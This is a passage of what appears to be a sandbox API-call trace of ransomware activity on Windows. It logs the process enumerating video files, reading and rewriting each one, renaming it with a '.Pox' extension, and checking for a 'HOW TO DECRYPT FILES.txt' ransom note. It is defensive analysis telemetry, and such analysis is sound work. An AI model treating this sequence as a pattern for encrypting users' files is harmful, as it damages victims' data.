lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0041.791] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0041.791] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi", lpFilePart=0x0) returned 0x5c [0041.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0041.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\hy_v9xfwfaiog\\8pz6fcho31zetuxydv8m.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.793] GetFileType (hFile=0x26c) returned 0x1 [0041.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0041.793] GetFileType (hFile=0x26c) returned 0x1 [0041.793] WriteFile (in: hFile=0x26c, lpBuffer=0x36cb630*, nNumberOfBytesToWrite=0x15ac0, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x36cb630*, lpNumberOfBytesWritten=0x3ae408*=0x15ac0, lpOverlapped=0x0) returned 1 [0041.795] CloseHandle (hObject=0x26c) returned 1 [0041.797] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi", lpFilePart=0x0) returned 0x5c [0041.797] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi.Pox", lpFilePart=0x0) returned 0x60 [0041.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0041.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\hy_v9xfwfaiog\\8pz6fcho31zetuxydv8m.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b27390, ftCreationTime.dwHighDateTime=0x1d4c742, ftLastAccessTime.dwLowDateTime=0x4a5301a0, ftLastAccessTime.dwHighDateTime=0x1d4c6d3, ftLastWriteTime.dwLowDateTime=0x2b19b4e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0)) returned 1 [0041.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0041.798] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\hy_v9xfwfaiog\\8pz6fcho31zetuxydv8m.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\hy_v9xfwfaiog\\8pz6fcho31zetuxydv8m.avi.pox")) returned 1 [0041.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0041.798] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS", lpFilePart=0x0) returned 0x47 [0041.798] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\", lpFilePart=0x0) returned 0x48 [0041.799] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x427b4c40, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0xfe32e400, ftLastAccessTime.dwHighDateTime=0x1d4d4ee, ftLastWriteTime.dwLowDateTime=0xfe32e400, ftLastWriteTime.dwHighDateTime=0x1d4d4ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f88 [0041.799] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x427b4c40, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0xfe32e400, ftLastAccessTime.dwHighDateTime=0x1d4d4ee, ftLastWriteTime.dwLowDateTime=0xfe32e400, ftLastWriteTime.dwHighDateTime=0x1d4d4ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.799] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14515280, ftCreationTime.dwHighDateTime=0x1d4c5ea, ftLastAccessTime.dwLowDateTime=0x54411620, ftLastAccessTime.dwHighDateTime=0x1d4d53d, ftLastWriteTime.dwLowDateTime=0x54411620, ftLastWriteTime.dwHighDateTime=0x1d4d53d, nFileSizeHigh=0x0, nFileSizeLow=0xf71c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Md5mR-GIf-.swf", cAlternateFileName="MD5MR-~1.SWF")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99bd26b0, ftCreationTime.dwHighDateTime=0x1d4d37d, ftLastAccessTime.dwLowDateTime=0x8e6587a0, ftLastAccessTime.dwHighDateTime=0x1d4d59c, ftLastWriteTime.dwLowDateTime=0x8e6587a0, ftLastWriteTime.dwHighDateTime=0x1d4d59c, nFileSizeHigh=0x0, nFileSizeLow=0x4ea9, dwReserved0=0x0, dwReserved1=0x0, cFileName="mhMLJM9Q3gkc.mp4", cAlternateFileName="MHMLJM~1.MP4")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6737d20, ftCreationTime.dwHighDateTime=0x1d4c5c5, ftLastAccessTime.dwLowDateTime=0x10260180, ftLastAccessTime.dwHighDateTime=0x1d4d452, ftLastWriteTime.dwLowDateTime=0x10260180, ftLastWriteTime.dwHighDateTime=0x1d4d452, nFileSizeHigh=0x0, nFileSizeLow=0x2255, dwReserved0=0x0, dwReserved1=0x0, cFileName="o21 pJbhYF47gJ.avi", cAlternateFileName="O21PJB~1.AVI")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a548f0, ftCreationTime.dwHighDateTime=0x1d4cb45, ftLastAccessTime.dwLowDateTime=0x7dc041b0, ftLastAccessTime.dwHighDateTime=0x1d4cef8, ftLastWriteTime.dwLowDateTime=0x7dc041b0, ftLastWriteTime.dwHighDateTime=0x1d4cef8, nFileSizeHigh=0x0, nFileSizeLow=0xe8ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="U9cE1a872Kv.mp4", cAlternateFileName="U9CE1A~1.MP4")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2844e000, ftCreationTime.dwHighDateTime=0x1d4d458, ftLastAccessTime.dwLowDateTime=0xf6ec1970, ftLastAccessTime.dwHighDateTime=0x1d4c83f, ftLastWriteTime.dwLowDateTime=0xf6ec1970, ftLastWriteTime.dwHighDateTime=0x1d4c83f, nFileSizeHigh=0x0, nFileSizeLow=0xcff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="vs0zSkSUS ZZ.flv", cAlternateFileName="VS0ZSK~1.FLV")) returned 1 [0041.801] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.801] FindClose (in: hFindFile=0x405f88 | out: hFindFile=0x405f88) returned 1 [0041.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0041.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0041.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0041.801] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS", lpFilePart=0x0) returned 0x47 [0041.801] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\", lpFilePart=0x0) returned 0x48 [0041.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x427b4c40, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0xfe32e400, ftLastAccessTime.dwHighDateTime=0x1d4d4ee, ftLastWriteTime.dwLowDateTime=0xfe32e400, ftLastWriteTime.dwHighDateTime=0x1d4d4ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f88 [0041.802] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x427b4c40, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0xfe32e400, ftLastAccessTime.dwHighDateTime=0x1d4d4ee, ftLastWriteTime.dwLowDateTime=0xfe32e400, ftLastWriteTime.dwHighDateTime=0x1d4d4ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.802] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14515280, ftCreationTime.dwHighDateTime=0x1d4c5ea, ftLastAccessTime.dwLowDateTime=0x54411620, ftLastAccessTime.dwHighDateTime=0x1d4d53d, ftLastWriteTime.dwLowDateTime=0x54411620, ftLastWriteTime.dwHighDateTime=0x1d4d53d, nFileSizeHigh=0x0, nFileSizeLow=0xf71c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Md5mR-GIf-.swf", cAlternateFileName="MD5MR-~1.SWF")) returned 1 [0041.803] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99bd26b0, ftCreationTime.dwHighDateTime=0x1d4d37d, ftLastAccessTime.dwLowDateTime=0x8e6587a0, ftLastAccessTime.dwHighDateTime=0x1d4d59c, ftLastWriteTime.dwLowDateTime=0x8e6587a0, ftLastWriteTime.dwHighDateTime=0x1d4d59c, nFileSizeHigh=0x0, nFileSizeLow=0x4ea9, dwReserved0=0x0, dwReserved1=0x0, cFileName="mhMLJM9Q3gkc.mp4", cAlternateFileName="MHMLJM~1.MP4")) returned 1 [0041.803] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6737d20, ftCreationTime.dwHighDateTime=0x1d4c5c5, ftLastAccessTime.dwLowDateTime=0x10260180, ftLastAccessTime.dwHighDateTime=0x1d4d452, ftLastWriteTime.dwLowDateTime=0x10260180, ftLastWriteTime.dwHighDateTime=0x1d4d452, nFileSizeHigh=0x0, nFileSizeLow=0x2255, dwReserved0=0x0, dwReserved1=0x0, cFileName="o21 pJbhYF47gJ.avi", cAlternateFileName="O21PJB~1.AVI")) returned 1 [0041.803] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a548f0, ftCreationTime.dwHighDateTime=0x1d4cb45, ftLastAccessTime.dwLowDateTime=0x7dc041b0, ftLastAccessTime.dwHighDateTime=0x1d4cef8, ftLastWriteTime.dwLowDateTime=0x7dc041b0, ftLastWriteTime.dwHighDateTime=0x1d4cef8, nFileSizeHigh=0x0, nFileSizeLow=0xe8ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="U9cE1a872Kv.mp4", cAlternateFileName="U9CE1A~1.MP4")) returned 1 [0041.804] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2844e000, ftCreationTime.dwHighDateTime=0x1d4d458, ftLastAccessTime.dwLowDateTime=0xf6ec1970, ftLastAccessTime.dwHighDateTime=0x1d4c83f, ftLastWriteTime.dwLowDateTime=0xf6ec1970, ftLastWriteTime.dwHighDateTime=0x1d4c83f, nFileSizeHigh=0x0, nFileSizeLow=0xcff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="vs0zSkSUS ZZ.flv", cAlternateFileName="VS0ZSK~1.FLV")) returned 1 [0041.804] FindNextFileW (in: hFindFile=0x405f88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2844e000, ftCreationTime.dwHighDateTime=0x1d4d458, ftLastAccessTime.dwLowDateTime=0xf6ec1970, ftLastAccessTime.dwHighDateTime=0x1d4c83f, ftLastWriteTime.dwLowDateTime=0xf6ec1970, ftLastWriteTime.dwHighDateTime=0x1d4c83f, nFileSizeHigh=0x0, nFileSizeLow=0xcff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="vs0zSkSUS ZZ.flv", cAlternateFileName="VS0ZSK~1.FLV")) returned 0 [0041.804] FindClose (in: hFindFile=0x405f88 | out: hFindFile=0x405f88) returned 1 [0041.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0041.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0041.804] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4", lpFilePart=0x0) returned 0x58 [0041.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0041.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\mhmljm9q3gkc.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.805] GetFileType (hFile=0x26c) returned 0x1 [0041.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0041.805] GetFileType (hFile=0x26c) returned 0x1 [0041.805] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x4ea9 [0041.805] ReadFile (in: hFile=0x26c, lpBuffer=0x242e69c, nNumberOfBytesToRead=0x4ea9, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x242e69c*, lpNumberOfBytesRead=0x3ae414*=0x4ea9, lpOverlapped=0x0) returned 1 [0041.806] CloseHandle (hObject=0x26c) returned 1 [0041.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0041.820] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0041.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4", lpFilePart=0x0) returned 0x58 [0041.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0041.820] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\mhmljm9q3gkc.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.821] GetFileType (hFile=0x26c) returned 0x1 [0041.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0041.821] GetFileType (hFile=0x26c) returned 0x1 [0041.821] WriteFile (in: hFile=0x26c, lpBuffer=0x2493df8*, nNumberOfBytesToWrite=0x4eb0, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x2493df8*, lpNumberOfBytesWritten=0x3ae408*=0x4eb0, lpOverlapped=0x0) returned 1 [0041.832] CloseHandle (hObject=0x26c) returned 1 [0041.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4", lpFilePart=0x0) returned 0x58 [0041.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4.Pox", lpFilePart=0x0) returned 0x5c [0041.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0041.833] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\mhmljm9q3gkc.mp4"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99bd26b0, ftCreationTime.dwHighDateTime=0x1d4d37d, ftLastAccessTime.dwLowDateTime=0x8e6587a0, ftLastAccessTime.dwHighDateTime=0x1d4d59c, ftLastWriteTime.dwLowDateTime=0x2b1e77a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x4eb0)) returned 1 [0041.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0041.834] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\mhmljm9q3gkc.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\mhMLJM9Q3gkc.mp4.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\mhmljm9q3gkc.mp4.pox")) returned 1 [0041.834] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi", lpFilePart=0x0) returned 0x5a [0041.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0041.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\o21 pjbhyf47gj.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.834] GetFileType (hFile=0x26c) returned 0x1 [0041.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0041.834] GetFileType (hFile=0x26c) returned 0x1 [0041.835] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x2255 [0041.835] ReadFile (in: hFile=0x26c, lpBuffer=0x2499358, nNumberOfBytesToRead=0x2255, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x2499358*, lpNumberOfBytesRead=0x3ae414*=0x2255, lpOverlapped=0x0) returned 1 [0041.835] CloseHandle (hObject=0x26c) returned 1 [0041.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0041.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: 